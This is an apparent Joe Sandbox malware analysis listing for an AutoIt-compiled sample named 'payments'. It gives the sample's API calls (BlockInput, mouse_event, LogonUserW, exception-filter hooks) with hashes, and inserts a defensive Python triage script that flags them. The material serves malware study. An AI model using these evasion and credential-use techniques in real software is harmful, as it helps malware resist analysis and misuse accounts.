                                                                                                                          • Instruction Fuzzy Hash: 2022B9716083019FDB24DF28C895B6FB7E4EF84314F144A1DF89A8B2A1DB71E944DB92
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4c22713d0756dcfe0593896180ac6289627dfdb62d6c940c37bc6a5f082110f0
                                                                                                                          • Instruction ID: 53e235828b78a21688b590389272a6dfd5a197e8046e9f4d5b52a88db3d13b5f
                                                                                                                          • Opcode Fuzzy Hash: 4c22713d0756dcfe0593896180ac6289627dfdb62d6c940c37bc6a5f082110f0
                                                                                                                          • Instruction Fuzzy Hash: DEB1FF20D2AF404DD6239639DD31336B65CAFBB2D5F91D71BFC2AB4E66EB2181834180
                                                                                                                          APIs
                                                                                                                          • __time64.LIBCMT ref: 00CDB6DF
                                                                                                                            • Part of subcall function 00CB344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CDBDC3,00000000,?,?,?,?,00CDBF70,00000000,?), ref: 00CB3453
                                                                                                                            • Part of subcall function 00CB344A: __aulldiv.LIBCMT ref: 00CB3473
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2893107130-0
                                                                                                                          • Opcode ID: 89c50f29e3e43a115f90b43d96e98dd613bdbc15c9636d225fafeb241d3b2721
                                                                                                                          • Instruction ID: 5946978c191372db4256b875e570ecb791c52ab7e97a60ab56861d15ccf3f514
                                                                                                                          • Opcode Fuzzy Hash: 89c50f29e3e43a115f90b43d96e98dd613bdbc15c9636d225fafeb241d3b2721
                                                                                                                          • Instruction Fuzzy Hash: 0A21AF76634610CBD729CF28C881A92B7E1EB95311B258E6DE4E5CB3C0CB74BE05DB64
APIs
• BlockInput.USER32(00000001), ref: 00CE6ACA
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
• Opcode ID: beed368c5699fc295360f88f03647ecfbc3bdf35a066717c94e180d277d4c1c5
• Instruction ID: a466023289e85da670ab6f2818e916aec1e66a35f6b7cdbbe711cafaac20a612
• Opcode Fuzzy Hash: beed368c5699fc295360f88f03647ecfbc3bdf35a066717c94e180d277d4c1c5
• Instruction Fuzzy Hash: 74E0D8352102046FC700EF5AD404D96B7ECAF747A5F04C426F905D7350DBB0F8049BA0
APIs
• mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00CD750A
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
• Opcode ID: 65ddfac03305c6503a0361a6ea53ac254a99b33b64116900b6f0ca800758ad0a
• Instruction ID: 26b6eeda97fb3ebb448ca6dfc187d208da902e173d12af426872e5aef5028b1c
• Opcode Fuzzy Hash: 65ddfac03305c6503a0361a6ea53ac254a99b33b64116900b6f0ca800758ad0a
• Instruction Fuzzy Hash: 46D067A416C61579E81A0725AC1FFB65549A301782FD4474B7713D92C0B9B45E01A432
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00CCAD3E), ref: 00CCB124
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
• Opcode ID: 834bf7a281ecd5aa26f362ac437a1c7f88b4e3a4e331dfa9f13c79461a90056c
• Instruction ID: ea7b57f9f2e7687d9e09843787de18e2600f511df6e4fbf83950809213997a61
• Opcode Fuzzy Hash: 834bf7a281ecd5aa26f362ac437a1c7f88b4e3a4e331dfa9f13c79461a90056c
• Instruction Fuzzy Hash: B6D05E320A460EBEDF028FA4DC02EAE3F6AEB04700F408110FA11C50A0C771D532AB60
APIs
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 5862324f76aed99d173efe0a00a1b64e3f66d6c724a5d11ed683854c62a5ef61
• Instruction ID: e7356046672644d829f44aa59a5674ecca462d5ac0a378a7817e654f52c75b77
• Opcode Fuzzy Hash: 5862324f76aed99d173efe0a00a1b64e3f66d6c724a5d11ed683854c62a5ef61
• Instruction Fuzzy Hash: BAC04CF1400209DFD751CBC4C944AEEB7BCAB08301F114091D145F1150DB70DB459B76
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 00CB818F
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: d7ea4af325e0f160c1bbd5df14fcbd1c15ff280e997e9af8254fc0b36fdea9e4
• Instruction ID: a4508055c247fb97238162873218b3350b54ba3f260a1f3d1f8808ed6d205fbb
• Opcode Fuzzy Hash: d7ea4af325e0f160c1bbd5df14fcbd1c15ff280e997e9af8254fc0b36fdea9e4
• Instruction Fuzzy Hash: F6A0113000020CBB8F002B82EC08888BF2EEA002A0B208020F80C80220CB22A8228AA2
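The API references in the entries above (BlockInput with argument 1, mouse_event with dwFlags 4, LogonUserW, SetUnhandledExceptionFilter, and the NameUser entry whose call line is missing from the listing) are the part of this function dump an analyst actually triages. The Python below is an added example, not Joe Sandbox or IDA-plugin code: it parses entries in the layout used on this page, decodes the BlockInput and mouse_event arguments the report shows, flags calls on a watch list, and reports entries whose API ID names a call that the listing does not show. The watch list, its notes and the SAMPLE_LISTING string are constructed for this example from the entries above (most Associated lines omitted for brevity).

```python
"""Triage Joe Sandbox 'IDA Plugin' function entries: parse, decode arguments, flag APIs.

Example code written for this report page; not part of Joe Sandbox or the analysed sample.
"""
import re
from dataclasses import dataclass, field

# Watch list with triage notes. The notes are this example's own, not a report field.
SUSPICIOUS_APIS = {
    "BlockInput": "blocks keyboard and mouse input (hinders interactive debugging)",
    "mouse_event": "synthesises mouse input (can dismiss prompts unattended)",
    "LogonUserW": "logs on as another user (credential use / run-as)",
    "SetUnhandledExceptionFilter": "replaces the top-level exception handler (anti-debug)",
}

# Win32 MOUSEEVENTF_* bits for the first mouse_event argument (dwFlags).
MOUSEEVENTF = {0x1: "MOVE", 0x2: "LEFTDOWN", 0x4: "LEFTUP", 0x8: "RIGHTDOWN",
               0x10: "RIGHTUP", 0x20: "MIDDLEDOWN", 0x40: "MIDDLEUP", 0x8000: "ABSOLUTE"}

# "• BlockInput.USER32(00000001), ref: 00CE6ACA"
API_CALL_RE = re.compile(
    r"^•\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
# "• Instruction Fuzzy Hash: 74E0D8..." and the other key/value bullets
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")


@dataclass
class FunctionEntry:
    api_calls: list = field(default_factory=list)   # [(name, module, [args], ref)]
    fields: dict = field(default_factory=dict)      # "API ID", "Instruction Fuzzy Hash", ...


def parse_entries(text):
    """Split a plugin listing into FunctionEntry objects, in report order."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line in ("Joe Sandbox IDA Plugin", "Similarity"):
            continue
        if line == "APIs":                      # an entry with an API list starts here
            current = FunctionEntry()
            entries.append(current)
            continue
        if line == "Memory Dump Source":
            # Starts a new entry unless we are still inside the API list of the current one.
            if current is None or current.fields:
                current = FunctionEntry()
                entries.append(current)
            continue
        m = API_CALL_RE.match(line)
        if m and current is not None:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.api_calls.append((m["name"], m["module"], args, m["ref"]))
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            value = m["value"].replace("Download File", "").strip()  # drop page link residue
            if m["key"] == "Associated":
                current.fields.setdefault("Associated", []).append(value)
            else:
                current.fields[m["key"]] = value
    return entries


def describe_call(name, args):
    """Decode the arguments the report shows for the two input-control APIs."""
    if name == "BlockInput" and args and args[0] != "?":
        return "BlockInput(TRUE): input blocked" if int(args[0], 16) else "BlockInput(FALSE): input released"
    if name == "mouse_event" and args and args[0] != "?":
        flags = int(args[0], 16)
        names = ["MOUSEEVENTF_" + n for bit, n in MOUSEEVENTF.items() if flags & bit]
        return "mouse_event(" + "|".join(names) + ")"
    return name + "(" + ", ".join(args) + ")"


def triage(entries):
    """Return (api, ref, decoded call, note) for every call to a watch-listed API."""
    return [(name, ref, describe_call(name, args), SUSPICIOUS_APIS[name])
            for e in entries for name, _mod, args, ref in e.api_calls if name in SUSPICIOUS_APIS]


def incomplete_entries(entries):
    """Entries whose API ID names a call but whose call list is empty (a gap in the listing)."""
    return [e for e in entries if e.fields.get("API ID") and not e.api_calls]


# Constructed excerpt of the listing on this page (three entries, most Associated lines dropped).
SAMPLE_LISTING = """
APIs
• BlockInput.USER32(00000001), ref: 00CE6ACA
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
• Instruction Fuzzy Hash: 74E0D8352102046FC700EF5AD404D96B7ECAF747A5F04C426F905D7350DBB0F8049BA0
APIs
• mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00CD750A
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Similarity
• API ID: mouse_event
• API String ID: 2434400541-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Similarity
• API ID: NameUser
• API String ID: 2645101109-0
"""

if __name__ == "__main__":
    parsed = parse_entries(SAMPLE_LISTING)
    for api, ref, decoded, note in triage(parsed):
        print(f"{ref}: {decoded} -> {note}")
    for e in incomplete_entries(parsed):
        print("API ID", e.fields["API ID"], "has no call line in the listing")
```

Running it on the constructed excerpt reports BlockInput(TRUE) at 00CE6ACA and a MOUSEEVENTF_LEFTUP click at 00CD750A, and lists the NameUser entry as having no call line, which is the same gap visible in the listing above. Pointing the parser at the full report text instead of SAMPLE_LISTING gives the complete set of refs to set breakpoints on.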
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8e636cbe1fcc9a60c085af77eb088bf14c72c93edebdab040c212143ddd4c82d
• Instruction ID: eaa86ca0162fef00596f0349721ec0d560c8ba268638879fed4ce78d158e523d
• Opcode Fuzzy Hash: 8e636cbe1fcc9a60c085af77eb088bf14c72c93edebdab040c212143ddd4c82d
• Instruction Fuzzy Hash: B0229070D0421ADFDF14DF98C488BAAB7B0FF24304F148169E95A9B391E731AE85DB91
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c1e1446df09a5114fd1c451b9e6e247f66d327df46fef3d016ebb33d0567e36f
• Instruction ID: c71d2a1317cd29c9ab24163e8df063ff28dfbe5480e8193220cda01761e1eed0
• Opcode Fuzzy Hash: c1e1446df09a5114fd1c451b9e6e247f66d327df46fef3d016ebb33d0567e36f
• Instruction Fuzzy Hash: 05127E70A00609DFDF04DFA9D999AEEB7F5FF48300F108569E416E7290EB35A911DB60
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Exception@8Throwstd::exception::exception
• String ID:
• API String ID: 3728558374-0
• Opcode ID: ab83c5aaeb10c0803813f9728b867b90eafea0bb042c53ee5f278398dd11379e
• Instruction ID: a1cd538dea8b0ee3bb3d5bce3b3efd2891b2a3943b86de1532f60b7426ca4855
• Opcode Fuzzy Hash: ab83c5aaeb10c0803813f9728b867b90eafea0bb042c53ee5f278398dd11379e
• Instruction Fuzzy Hash: B202A270A00205EBCF04DF68D9956BEB7B5FF45300F148069E80ADB295EB31DE15DBA1
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
• Instruction ID: 777e087585a600dd64ef17f2bb65fbe97e8c5ff77c9b083e8581cd150e016b8a
• Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
• Instruction Fuzzy Hash: 03C1B8322051930ADF6D467A84344BFFBA15E927F572A076DD8B3CB4E5EF20CA25D620
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                          • Instruction ID: e064f2e7e03e3f95e3536d778c449a1198b9a4bb6c7e4113bb151f95cc5e2362
                                                                                                                          • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                          • Instruction Fuzzy Hash: 8CC1A2322051930ADF6D463AC4344BFFBA15AA2BB572A176DD4B3CB4D5EF20DB24D620
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                          • Instruction ID: 208efe71893016826d26e3c0d380f5519bbc0983aa9699224cab6ce8b4f7364b
                                                                                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                          • Instruction Fuzzy Hash: E1C1A4322050930ADF6D467AC47447EBBA15AA3BB931A077DD4B3CB5D5EF30CA26D620
                                                                                                                          APIs
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00CEA2FE
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00CEA310
                                                                                                                          • DestroyWindow.USER32 ref: 00CEA31E
                                                                                                                          • GetDesktopWindow.USER32 ref: 00CEA338
                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00CEA33F
                                                                                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00CEA480
                                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00CEA490
                                                                                                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA4D8
                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00CEA4E4
                                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00CEA51E
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA540
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA553
                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA55E
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00CEA567
                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA576
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00CEA57F
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA586
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00CEA591
                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA5A3
                                                                                                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00D1D9BC,00000000), ref: 00CEA5B9
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00CEA5C9
                                                                                                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00CEA5EF
                                                                                                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00CEA60E
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA630
                                                                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA81D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                          • String ID: $@U=u$AutoIt v3$DISPLAY$static
                                                                                                                          • API String ID: 2211948467-3613752883
                                                                                                                          • Opcode ID: c2ec6f5d9bbda82890182f039fdc294c709fbac0ac370b220e8075aa87d911a7
                                                                                                                          • Instruction ID: f4c800d079596a1615dbcf363720dbc7f537cf318edff7fc8ca5cdd954f6f1e5
                                                                                                                          • Opcode Fuzzy Hash: c2ec6f5d9bbda82890182f039fdc294c709fbac0ac370b220e8075aa87d911a7
                                                                                                                          • Instruction Fuzzy Hash: 54024C75900254AFDB14DFA9CD89EAE7BB9FB48310F108158F915EB2A1DB70ED42CB60
                                                                                                                          APIs
                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00CFD2DB
                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00CFD30C
                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00CFD318
                                                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 00CFD332
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00CFD341
                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00CFD36C
                                                                                                                          • GetSysColor.USER32(00000010), ref: 00CFD374
                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00CFD37B
                                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 00CFD38A
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00CFD391
                                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00CFD3DC
                                                                                                                          • FillRect.USER32(?,?,00000000), ref: 00CFD40E
                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00CFD439
                                                                                                                            • Part of subcall function 00CFD575: GetSysColor.USER32(00000012), ref: 00CFD5AE
                                                                                                                            • Part of subcall function 00CFD575: SetTextColor.GDI32(?,?), ref: 00CFD5B2
                                                                                                                            • Part of subcall function 00CFD575: GetSysColorBrush.USER32(0000000F), ref: 00CFD5C8
                                                                                                                            • Part of subcall function 00CFD575: GetSysColor.USER32(0000000F), ref: 00CFD5D3
                                                                                                                            • Part of subcall function 00CFD575: GetSysColor.USER32(00000011), ref: 00CFD5F0
                                                                                                                            • Part of subcall function 00CFD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CFD5FE
                                                                                                                            • Part of subcall function 00CFD575: SelectObject.GDI32(?,00000000), ref: 00CFD60F
                                                                                                                            • Part of subcall function 00CFD575: SetBkColor.GDI32(?,00000000), ref: 00CFD618
